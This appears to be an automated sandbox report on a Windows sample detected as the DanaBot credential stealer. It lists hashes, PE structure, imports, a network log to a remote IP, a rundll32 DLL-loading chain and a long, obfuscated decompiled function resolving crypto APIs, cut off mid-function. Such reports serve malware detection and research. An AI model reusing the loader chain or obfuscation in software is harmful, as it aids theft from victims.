                                              MD5:8B8486B5FC4DCF1C6120FA222F2A9082
                                              SHA1:C13E895A845E3F22BE68B567B69E9BDACA24018F
                                              SHA-256:4FB35A20EED93D90C9AC2FAA0ECB2F9735A872CDECF7FA465FFAC379A2EB8E16
                                              SHA-512:E7DEA9C422B06A457E918B0DCE4B3396690F3A5D913FD9F7D0042DD8789A879E6A2EF3ECF0C246B8F1D730FC64DC0A54314B1C8D084AF11C98B3E9068BA286CA
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_DanaBot_stealer_dll_1, Description: Yara detected DanaBot stealer dll, Source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, Author: Joe Security
                                              Reputation:low

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.883013679667207
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.94%
                                              • Clipper DOS Executable (2020/12) 0.02%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • VXD Driver (31/22) 0.00%
                                              File name:Coy2GAiARw.exe
                                              File size:1159680
                                              MD5:5ad64bb7be7914ad793ae5ccb98a571e
                                              SHA1:60aeca403754af25ff307050496a70eabe706a8a
                                              SHA256:18ae9ea1c1d71b33777c8772248580f17a2bcecf1aa0e8f71ec15d4b33d5253b
                                              SHA512:a08299221b3bcca7808c84480785656bd49dc439b028bf6b1cd44682a6b6c43ffed84c3f452d3578f9408adcf79233ad86a65b619d60004fbd6b2a30df4f7019
                                              SSDEEP:24576:xTcsunDS/lXSKgG3DSRGNp0IMXgZlnLei6Qpf8H89IS:VAWlXqbAp0XMnqLc8

                                              File Icon

                                              Icon Hash:e4a6daac9c8c9eb0

                                              Static PE Info

                                              General

                                              Entrypoint:0x401b90
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x5F65541F [Sat Sep 19 00:43:11 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:9a761cc30337d6ef5b44d15f62f53af5

                                              Entrypoint Preview

                                              Instruction
                                              call 00007FF670770B2Ch
                                              jmp 00007FF67076DBEEh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              call 00007FF67076DD9Ch
                                              xchg cl, ch
                                              jmp 00007FF67076DD84h
                                              call 00007FF67076DD93h
                                              fxch st(0), st(1)
                                              jmp 00007FF67076DD7Bh
                                              fabs
                                              fld1
                                              mov ch, cl
                                              xor cl, cl
                                              jmp 00007FF67076DD71h
                                              mov byte ptr [ebp-00000090h], FFFFFFFEh
                                              fabs
                                              fxch st(0), st(1)
                                              fabs
                                              fxch st(0), st(1)
                                              fpatan
                                              or cl, cl
                                              je 00007FF67076DD66h
                                              fldpi
                                              fsubrp st(1), st(0)
                                              or ch, ch
                                              je 00007FF67076DD64h
                                              fchs
                                              ret
                                              fabs
                                              fld st(0), st(0)
                                              fld st(0), st(0)
                                              fld1
                                              fsubrp st(1), st(0)
                                              fxch st(0), st(1)
                                              fld1
                                              faddp st(1), st(0)
                                              fmulp st(1), st(0)
                                              ftst
                                              wait
                                              fstsw word ptr [ebp-000000A0h]
                                              wait
                                              test byte ptr [ebp-0000009Fh], 00000001h
                                              jne 00007FF67076DD67h
                                              xor ch, ch
                                              fsqrt
                                              ret
                                              pop eax
                                              jmp 00007FF670770CFFh
                                              fstp st(0)
                                              fld tbyte ptr [004FCDCAh]
                                              ret
                                              fstp st(0)
                                              or cl, cl
                                              je 00007FF67076DD6Dh
                                              fstp st(0)
                                              fldpi
                                              or ch, ch
                                              je 00007FF67076DD64h
                                              fchs
                                              ret
                                              fstp st(0)
                                              fldz
                                              or ch, ch
                                              je 00007FF67076DD59h
                                              fchs
                                              ret
                                              fstp st(0)
                                              jmp 00007FF670770CD5h
                                              fstp st(0)
                                              mov cl, ch
                                              jmp 00007FF67076DD62h
                                              call 00007FF67076DD2Eh
                                              jmp 00007FF670770CE0h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              add esp, 00FFFD30h

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xffa74 | 0x28 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x173000 | 0x19248 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfc1a0 | 0x1c | .rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0xfe408 | 0x18 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfe3c0 | 0x40 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0xfc000 | 0x150 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0xfae4c | 0xfb000 | False | 0.980722617343 | data | 7.99111772368 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata | 0xfc000 | 0x41e0 | 0x4200 | False | 0.27959280303 | data | 4.10242644671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0x101000 | 0x6f44c | 0x2200 | False | 0.196461397059 | data | 2.18669345376 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .nusavu | 0x171000 | 0x270 | 0x400 | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .pudipuv | 0x172000 | 0x17 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x173000 | 0x19248 | 0x19400 | False | 0.648089418317 | data | 6.25957183656 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_CURSOR | 0x18a0d0 | 0x130 | data
                                              RT_CURSOR | 0x18a218 | 0xea8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
                                              RT_CURSOR | 0x18b0c0 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
                                              RT_CURSOR | 0x18b990 | 0x130 | data
                                              RT_CURSOR | 0x18bac0 | 0xb0 | GLS_BINARY_LSB_FIRST
                                              RT_ICON | 0x173880 | 0x6c8 | data
                                              RT_ICON | 0x173f48 | 0x568 | GLS_BINARY_LSB_FIRST
                                              RT_ICON | 0x1744b0 | 0x25a8 | data
                                              RT_ICON | 0x176a58 | 0x468 | GLS_BINARY_LSB_FIRST
                                              RT_ICON | 0x176f00 | 0xea8 | data
                                              RT_ICON | 0x177da8 | 0x8a8 | data
                                              RT_ICON | 0x178650 | 0x568 | GLS_BINARY_LSB_FIRST
                                              RT_ICON | 0x178bb8 | 0x25a8 | data
                                              RT_ICON | 0x17b160 | 0x10a8 | data
                                              RT_ICON | 0x17c208 | 0x988 | data
                                              RT_ICON | 0x17cb90 | 0x468 | GLS_BINARY_LSB_FIRST
                                              RT_ICON | 0x17d060 | 0xea8 | data
                                              RT_ICON | 0x17df08 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 8552318, next used block 11647165
                                              RT_ICON | 0x17e7b0 | 0x6c8 | data
                                              RT_ICON | 0x17ee78 | 0x568 | GLS_BINARY_LSB_FIRST
                                              RT_ICON | 0x17f3e0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                              RT_ICON | 0x181988 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 719103179, next used block 786077129
                                              RT_ICON | 0x182a30 | 0x988 | data
                                              RT_ICON | 0x1833b8 | 0x468 | GLS_BINARY_LSB_FIRST
                                              RT_ICON | 0x183898 | 0xea8 | data
                                              RT_ICON | 0x184740 | 0x8a8 | data
                                              RT_ICON | 0x184fe8 | 0x6c8 | data
                                              RT_ICON | 0x1856b0 | 0x568 | GLS_BINARY_LSB_FIRST
                                              RT_ICON | 0x185c18 | 0x25a8 | data
                                              RT_ICON | 0x1881c0 | 0x10a8 | data
                                              RT_ICON | 0x189268 | 0x988 | data
                                              RT_ICON | 0x189bf0 | 0x468 | GLS_BINARY_LSB_FIRST
                                              RT_STRING | 0x18bd50 | 0x44e | data | English | Trinidad
                                              RT_STRING | 0x18c1a0 | 0xa4 | data | English | Trinidad
                                              RT_GROUP_CURSOR | 0x18a200 | 0x14 | data
                                              RT_GROUP_CURSOR | 0x18b968 | 0x22 | data
                                              RT_GROUP_CURSOR | 0x18bb70 | 0x22 | data
                                              RT_GROUP_ICON | 0x18a058 | 0x76 | data
                                              RT_GROUP_ICON | 0x183820 | 0x76 | data
                                              RT_GROUP_ICON | 0x176ec0 | 0x3e | data
                                              RT_GROUP_ICON | 0x17cff8 | 0x68 | data
                                              RT_VERSION | 0x18bb98 | 0x1b4 | data

                                              Imports

                                              DLL | Import
                                              KERNEL32.dll | HeapReAlloc, UnmapViewOfFile, GetCurrentProcess, SleepEx, ReadConsoleW, GetEnvironmentStrings, InitAtomTable, HeapDestroy, FindNextVolumeW, WriteConsoleW, GetModuleFileNameW, CreateActCtxA, GetOverlappedResult, GetACP, ReleaseSemaphore, DeactivateActCtx, SetLastError, GetProcAddress, ResetEvent, GetAtomNameA, LocalAlloc, GetModuleHandleA, GetProcessShutdownParameters, EraseTape, VirtualProtect, EndUpdateResourceA, LCMapStringW, lstrcpyA, EncodePointer, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetModuleHandleW, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapFree, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, SetFilePointer, CloseHandle, ExitProcess, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetOEMCP, IsValidCodePage, Sleep, WideCharToMultiByte, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LoadLibraryW, RaiseException, MultiByteToWideChar, GetStringTypeW, IsProcessorFeaturePresent, HeapSize, CreateFileW

                                              Version Infos

                                              Description | Data
                                              InternalName | natgpianizu.iwa
                                              ProductVersion | 91.40.21.87
                                              Copyright | Copyrighz (C) 2021, fudkagat
                                              Translation | 0x0196 0x03fe

                                              Possible Origin

                                              Language of compilation system | Country where language is spoken | Map
                                              English | Trinidad

                                              Network Behavior

                                              TCP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 14, 2021 11:51:23.434040070 CEST | 49742 | 443 | 192.168.2.3 | 192.119.110.73
                                              Oct 14, 2021 11:51:23.434083939 CEST | 443 | 49742 | 192.119.110.73 | 192.168.2.3
                                              Oct 14, 2021 11:51:23.434166908 CEST | 49742 | 443 | 192.168.2.3 | 192.119.110.73
                                              Oct 14, 2021 11:51:23.568929911 CEST | 49742 | 443 | 192.168.2.3 | 192.119.110.73
                                              Oct 14, 2021 11:51:23.569027901 CEST | 443 | 49742 | 192.119.110.73 | 192.168.2.3
                                              Oct 14, 2021 11:51:23.569114923 CEST | 443 | 49742 | 192.119.110.73 | 192.168.2.3
                                              Oct 14, 2021 11:51:23.569117069 CEST | 49742 | 443 | 192.168.2.3 | 192.119.110.73
                                              Oct 14, 2021 11:51:23.569152117 CEST | 443 | 49742 | 192.119.110.73 | 192.168.2.3

                                              Code Manipulations

                                              System Behavior

                                              General

                                              Start time:11:51:13
                                              Start date:14/10/2021
                                              Path:C:\Users\user\Desktop\Coy2GAiARw.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Coy2GAiARw.exe'
                                              Imagebase:0x400000
                                              File size:1159680 bytes
                                              MD5 hash:5AD64BB7BE7914AD793AE5CCB98A571E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_DanaBot_stealer_dll_1, Description: Yara detected DanaBot stealer dll, Source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:11:51:21
                                              Start date:14/10/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXE
                                              Imagebase:0xd10000
                                              File size:61952 bytes
                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                                Executed Functions

                                                C-Code - Quality: 91%
                                                			E004EE96C(void* __ebx, void* __edi, void* __esi) {
                                                				char _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				struct HINSTANCE__* _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				char _v48;
                                                				intOrPtr _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				signed int _t562;
                                                				signed int _t567;
                                                				void* _t570;
                                                				void* _t577;
                                                				signed int _t580;
                                                				signed int _t582;
                                                				signed int _t585;
                                                				signed int _t587;
                                                				void* _t589;
                                                				signed int _t605;
                                                				signed int _t607;
                                                				signed int _t609;
                                                				void* _t614;
                                                				signed int _t616;
                                                				signed int _t619;
                                                				signed int _t621;
                                                				void* _t623;
                                                				signed int _t627;
                                                				signed int _t628;
                                                				signed int _t629;
                                                				void* _t631;
                                                				signed int _t634;
                                                				signed int _t641;
                                                				signed int _t643;
                                                				intOrPtr _t644;
                                                				void* _t645;
                                                				signed int _t647;
                                                				void* _t656;
                                                				signed int _t658;
                                                				signed int _t659;
                                                				void* _t662;
                                                				void* _t664;
                                                				void* _t665;
                                                				signed int _t666;
                                                				void* _t668;
                                                				signed int _t669;
                                                				signed int _t670;
                                                				signed int _t672;
                                                				signed int _t676;
                                                				signed int _t678;
                                                				signed int _t679;
                                                				signed int _t682;
                                                				void* _t686;
                                                				signed int _t696;
                                                				void* _t698;
                                                				signed int _t700;
                                                				signed int _t703;
                                                				void* _t710;
                                                				void* _t713;
                                                				signed int _t715;
                                                				signed int _t724;
                                                				signed int _t726;
                                                				signed int _t728;
                                                				void* _t729;
                                                				signed int _t733;
                                                				signed int _t736;
                                                				signed int _t737;
                                                				void* _t738;
                                                				signed int _t739;
                                                				signed int _t744;
                                                				signed int _t745;
                                                				signed int _t748;
                                                				signed int _t750;
                                                				signed int _t752;
                                                				signed int _t758;
                                                				signed int _t759;
                                                				signed int _t761;
                                                				signed int _t762;
                                                				signed int _t763;
                                                				signed int _t765;
                                                				signed int _t766;
                                                				signed int _t772;
                                                				void* _t774;
                                                				void* _t776;
                                                				signed int _t777;
                                                				signed int _t778;
                                                				intOrPtr _t780;
                                                				signed int _t781;
                                                				void* _t782;
                                                				void* _t783;
                                                				signed int _t785;
                                                				void* _t791;
                                                				signed int _t793;
                                                				signed int _t794;
                                                				signed int _t797;
                                                				signed int _t801;
                                                				signed int _t802;
                                                				signed int _t804;
                                                				void* _t809;
                                                				void* _t811;
                                                				signed int _t814;
                                                				signed int _t830;
                                                				signed int _t834;
                                                				signed int _t836;
                                                				signed int _t838;
                                                				void* _t842;
                                                				signed int _t847;
                                                				signed int _t850;
                                                				signed int _t852;
                                                				signed int _t859;
                                                				void* _t865;
                                                				signed int _t876;
                                                				signed int _t878;
                                                				void* _t880;
                                                				signed int _t885;
                                                				signed int _t887;
                                                				void* _t896;
                                                				signed int _t898;
                                                				signed int _t901;
                                                				void* _t908;
                                                				void* _t910;
                                                				void* _t918;
                                                				signed int _t920;
                                                				void* _t927;
                                                				signed int _t928;
                                                				signed int _t930;
                                                				signed int _t931;
                                                				void* _t933;
                                                				signed int _t935;
                                                				void* _t936;
                                                				signed int _t939;
                                                				void* _t944;
                                                				signed int _t945;
                                                				signed int _t946;
                                                				signed int _t951;
                                                				signed int _t952;
                                                				void* _t953;
                                                				void* _t954;
                                                				signed int _t955;
                                                				signed int _t958;
                                                				signed int _t966;
                                                				signed int _t968;
                                                				void* _t972;
                                                				signed int _t983;
                                                				signed int _t984;
                                                				signed int _t990;
                                                				signed int _t993;
                                                				signed int _t995;
                                                				signed int _t996;
                                                				signed int _t998;
                                                				signed int _t1009;
                                                				void* _t1013;
                                                				signed int _t1015;
                                                				signed int _t1019;
                                                				signed int _t1023;
                                                				void* _t1024;
                                                				void* _t1026;
                                                				signed int _t1028;
                                                				signed int _t1035;
                                                				signed int _t1036;
                                                				signed int _t1037;
                                                				signed int _t1038;
                                                				signed int _t1046;
                                                				signed int _t1048;
                                                				signed int _t1050;
                                                				signed int _t1051;
                                                				signed int _t1052;
                                                				signed int _t1053;
                                                				signed int _t1054;
                                                				signed int _t1056;
                                                				signed int _t1066;
                                                				signed int _t1067;
                                                				void* _t1068;
                                                				signed int _t1074;
                                                				void* _t1077;
                                                				signed int _t1079;
                                                				signed int _t1080;
                                                				void* _t1081;
                                                				void* _t1087;
                                                				signed int _t1095;
                                                				signed int _t1099;
                                                				signed int _t1101;
                                                				struct HINSTANCE__* _t1102;
                                                				signed int _t1107;
                                                				void* _t1109;
                                                				signed int _t1111;
                                                				signed int _t1112;
                                                				signed int _t1113;
                                                				signed int _t1116;
                                                				void* _t1117;
                                                				void* _t1119;
                                                				signed int _t1123;
                                                				signed int _t1131;
                                                				void* _t1133;
                                                				signed int _t1138;
                                                				signed int _t1145;
                                                				void* _t1147;
                                                				signed int _t1152;
                                                				signed int _t1155;
                                                				void* _t1157;
                                                				signed int _t1162;
                                                				signed int _t1166;
                                                				signed int _t1168;
                                                				signed int _t1169;
                                                				signed int _t1171;
                                                				void* _t1172;
                                                				signed int _t1173;
                                                				signed int _t1174;
                                                				signed int _t1176;
                                                				intOrPtr _t1180;
                                                				void* _t1184;
                                                				signed int _t1187;
                                                				void* _t1189;
                                                				signed int _t1191;
                                                				signed int _t1192;
                                                				signed int _t1193;
                                                				signed int _t1195;
                                                				signed int _t1197;
                                                				signed int _t1198;
                                                				signed int _t1199;
                                                				void* _t1201;
                                                				signed int _t1203;
                                                				void* _t1207;
                                                				signed int _t1208;
                                                				signed int _t1215;
                                                				signed int _t1217;
                                                				signed int _t1221;
                                                				signed int _t1227;
                                                				void* _t1229;
                                                				signed int _t1236;
                                                				signed int _t1239;
                                                				void* _t1241;
                                                				signed int _t1244;
                                                				signed int _t1249;
                                                				signed int _t1250;
                                                				signed int _t1254;
                                                				signed int _t1256;
                                                				signed int _t1258;
                                                				signed int _t1260;
                                                				signed int _t1261;
                                                				signed int _t1262;
                                                				void* _t1263;
                                                				signed int _t1264;
                                                				signed int _t1267;
                                                				signed int _t1272;
                                                				signed int _t1273;
                                                				signed int _t1275;
                                                				signed int _t1277;
                                                				signed int _t1278;
                                                				signed int _t1281;
                                                				signed int _t1285;
                                                				void* _t1298;
                                                				signed int _t1300;
                                                				signed int _t1302;
                                                				signed int _t1303;
                                                				signed int _t1306;
                                                				signed int _t1310;
                                                				void* _t1311;
                                                				signed int _t1318;
                                                				signed int _t1322;
                                                				signed int _t1324;
                                                				signed int _t1325;
                                                				signed int _t1331;
                                                				signed int _t1334;
                                                				signed int _t1341;
                                                				signed int _t1343;
                                                				signed int _t1346;
                                                				signed int _t1350;
                                                				signed int _t1352;
                                                				signed int _t1354;
                                                				signed int _t1355;
                                                				void* _t1356;
                                                				void* _t1361;
                                                				signed int _t1363;
                                                				signed int _t1364;
                                                				void* _t1365;
                                                				signed int _t1366;
                                                				signed int _t1370;
                                                				signed int _t1371;
                                                				signed int _t1372;
                                                				signed int _t1373;
                                                				signed int _t1376;
                                                				signed int _t1378;
                                                				signed int _t1380;
                                                				signed int _t1381;
                                                				signed int _t1383;
                                                				signed int _t1387;
                                                				void* _t1388;
                                                				signed int _t1390;
                                                				signed int _t1401;
                                                				signed int _t1405;
                                                				void* _t1409;
                                                				void* _t1411;
                                                				signed int _t1413;
                                                				void* _t1417;
                                                				signed int _t1427;
                                                				signed int _t1429;
                                                				signed int _t1434;
                                                				signed int _t1440;
                                                				intOrPtr _t1447;
                                                				intOrPtr _t1448;
                                                				signed int _t1449;
                                                				signed int _t1452;
                                                				void* _t1453;
                                                				void* _t1463;
                                                				signed int _t1465;
                                                				void* _t1466;
                                                				signed int _t1467;
                                                				signed int _t1478;
                                                				signed int _t1484;
                                                				signed int _t1485;
                                                				signed int _t1486;
                                                				intOrPtr _t1488;
                                                				void* _t1492;
                                                				signed int _t1493;
                                                				signed int _t1500;
                                                				signed int _t1502;
                                                				void* _t1505;
                                                				signed int _t1506;
                                                				signed int _t1510;
                                                				void* _t1516;
                                                				intOrPtr _t1535;
                                                				void* _t1539;
                                                				void* _t1540;
                                                				intOrPtr _t1541;
                                                				void* _t1549;
                                                				void* _t1555;
                                                				void* _t1556;
                                                				void* _t1559;
                                                				void* _t1562;
                                                				signed int _t1564;
                                                				void* _t1576;
                                                				void* _t1577;
                                                				void* _t1581;
                                                				void* _t1582;
                                                				void* _t1586;
                                                				void* _t1587;
                                                				void* _t1602;
                                                				void* _t1605;
                                                				void* _t1606;
                                                				void* _t1607;
                                                				void* _t1611;
                                                				void* _t1616;
                                                				void* _t1623;
                                                				void* _t1626;
                                                				void* _t1628;
                                                				void* _t1630;
                                                				void* _t1636;
                                                				void* _t1641;
                                                				void* _t1642;
                                                				void* _t1643;
                                                				void* _t1646;
                                                				void* _t1660;
                                                				void* _t1669;
                                                
                                                				_t1395 = __ebx;
                                                				_t1539 = _t1540;
                                                				_t1541 = _t1540 + 0xffffffc8;
                                                				_push(__ebx);
                                                				_v8 = 0;
                                                				_push(_t1539);
                                                				_push(0x4f07fa);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t1541;
                                                				_push(_t1539);
                                                				_push(0x4f065b);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t1541;
                                                				_v32 = 0;
                                                				if(_v32 >= 2) {
                                                					L4:
                                                					_t562 = E004FEF50; // 0xa3b3f6c0
                                                					 *0x4feedc = _t562 *  *0x4feeec;
                                                					E00407678(_v8, 0, 1,  &_v8);
                                                					_t567 =  *0x4feef0; // 0x44632301
                                                					if(_t567 -  *0x4fef28 < 0x68) {
                                                						_t1381 = E004FEF0C; // 0xb52124bf
                                                						 *0x4fef04 = _t1381 +  *0x4feefc;
                                                						_t1383 = E004FEF10; // 0x1cb931c0
                                                						E004FEF10 = E0040489C(_t1383);
                                                					}
                                                					 *0x4fef30 = E004FEED0 * 0xc2;
                                                					_t570 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4fef44 = _t570 +  *0x4feed8;
                                                					_v36 = GetModuleHandleW(L"advapi32.dll");
                                                					_v16 = _v28 + _v32;
                                                					if(_v24 + _v20 != _v20) {
                                                						L10:
                                                						_t577 = E004FEED0; // 0xc3c34ef0
                                                						 *0x4feefc = _t577 -  *0x4feee0;
                                                						asm("fild dword [0x4feee8]");
                                                						E004FEF10 = E004048D8();
                                                						_t580 =  *0x4feefc; // 0x4b08dcc7
                                                						E004FEF2C = _t580 + E004FEF20;
                                                						_t582 =  *0x4fef30; // 0xa1d816
                                                						 *0x4fef3c = _t582 +  *0x4fef4c;
                                                						if(_v36 == 0) {
                                                							L192:
                                                							asm("fild dword [ebp-0xc]");
                                                							_v24 = E004048D8();
                                                							_t585 =  *0x4feef4; // 0xb52124ca
                                                							 *0x4fef44 = _t585 * E004FEF20;
                                                							_t587 =  *0x4feef4; // 0xb52124ca
                                                							 *0x4feecc = _t587 + 4;
                                                							_t589 = E004FEF0C; // 0xb52124bf
                                                							 *0x4feee8 = _t589 + 0x3b;
                                                							if(_v28 - _v16 == _v16) {
                                                								asm("fild dword [0x4feeec]");
                                                								 *0x4fef04 = E004048CC();
                                                							}
                                                							_pop(_t1447);
                                                							 *[fs:eax] = _t1447;
                                                							_pop(_t1448);
                                                							 *[fs:eax] = _t1448;
                                                							_push(E004F0801);
                                                							return E004069A8( &_v8);
                                                						} else {
                                                							 *0x505900 = GetProcAddress(_v36, "CryptAcquireContextA");
                                                							_v20 = _v32 + 0x93;
                                                							_v24 = _v16 - 0x72;
                                                							 *0x4fef3c =  *0x4feee8 * 0x3c;
                                                							_t605 = E004FEF00; // 0xa3b3f6c0
                                                							 *0x4fef4c = _t605 - 0x3a;
                                                							_t607 =  *0x4feea0; // 0xa1d900
                                                							_t1449 =  *0x4feef0; // 0x44632301
                                                							if(_t607 -  *0x4feecc <= _t1449 -  *0x4feecc) {
                                                								_t609 =  *0x4feea0; // 0xa1d900
                                                								 *0x4feee8 = _t609;
                                                							} else {
                                                								_t1370 =  *0x4fef30; // 0xa1d816
                                                								E004FEED0 = _t1370;
                                                							}
                                                							 *0x4fef04 =  *0x4fef40 * 0x35;
                                                							 *0x505904 = GetProcAddress(_v36, "CryptReleaseContext");
                                                							_v32 = 0;
                                                							if(_v32 < 9) {
                                                								_v32 = _v32 + 1;
                                                								_t1363 =  *0x4fef4c; // 0x43c1493c
                                                								 *0x4fef4c = _t1363;
                                                								_t1364 = E004FEF38; // 0xc3c34fdc
                                                								E004FEF50 = _t1364;
                                                								_t1365 = E004FEF50; // 0xa3b3f6c0
                                                								_t1555 = _t1365 -  *0x4fef4c; // 0x43c1493c
                                                								if(_t1555 <= 0) {
                                                									_t1366 =  *0x4feee8; // 0xdcd0f434
                                                									E004FEF0C = _t1366 + E004FEF50;
                                                								} else {
                                                									_v12 = _v24 + _v28;
                                                								}
                                                							}
                                                							_t614 = E004FEF2C; // 0xa1d900
                                                							 *0x4fef4c = _t614 -  *0x4feed8;
                                                							_t616 =  *0x4fef28; // 0x3c79b5d4
                                                							_v60 = _t616 + 0xbd;
                                                							asm("fild dword [ebp-0x38]");
                                                							 *0x4feed8 = E004048CC();
                                                							_t619 = E004FEF38; // 0xc3c34fdc
                                                							 *0x4feef0 = _t619 *  *0x4fef44;
                                                							_t621 =  *0x4fef18; // 0xbc3e19a
                                                							_t1556 = _t621 -  *0x4fef04 -  *0x4feef4; // 0xb52124ca
                                                							if(_t1556 == 0) {
                                                								_t1361 = E004FEF00; // 0xa3b3f6c0
                                                								E004FEF00 = E0040489C(_t1361);
                                                							}
                                                							_t623 = E004FEF20; // 0x6e687a1a
                                                							E004FEF10 = _t623;
                                                							 *0x505908 = GetProcAddress(_v36, "CryptDestroyKey");
                                                							_v32 = 0;
                                                							do {
                                                								_t627 =  *0x4fef44; // 0x38993
                                                								 *0x4feea0 = _t627;
                                                								_v32 = _v32 + 1;
                                                							} while (_v32 != 4);
                                                							_t628 =  *0x4feefc; // 0x4b08dcc7
                                                							E004FEED0 = _t628;
                                                							_t629 =  *0x4feed8; // 0x1cb9338e
                                                							 *0x4feed8 = E0040489C(_t629);
                                                							_t631 = E004FEED0; // 0xc3c34ef0
                                                							_t1559 = _t631 -  *0x4feed8; // 0x1cb9338e
                                                							if(_t1559 > 0) {
                                                								_v16 = _v28 * 0xb2;
                                                								E00406CF4( &_v8, L"NlsData0020.dll");
                                                							}
                                                							if(0xb7 -  *0x4fef40 < 0x8c) {
                                                								_t1350 =  *0x4feed8; // 0x1cb9338e
                                                								 *0x4fef30 = _t1350 +  *0x4feeec;
                                                								_t1352 = E004FEF34; // 0xc3c34ef0
                                                								_t1562 = _t1352 -  *0x4fef48 - E004FEF34; // 0xc3c34ef0
                                                								if(_t1562 < 0) {
                                                									_t1356 = E004FEF20; // 0x6e687a1a
                                                									E004FEF50 = _t1356 - 0x44;
                                                								}
                                                								_t1354 = E004FEF00; // 0xa3b3f6c0
                                                								_t1355 = _t1354 *  *0x4fef30;
                                                								_t1564 = _t1355;
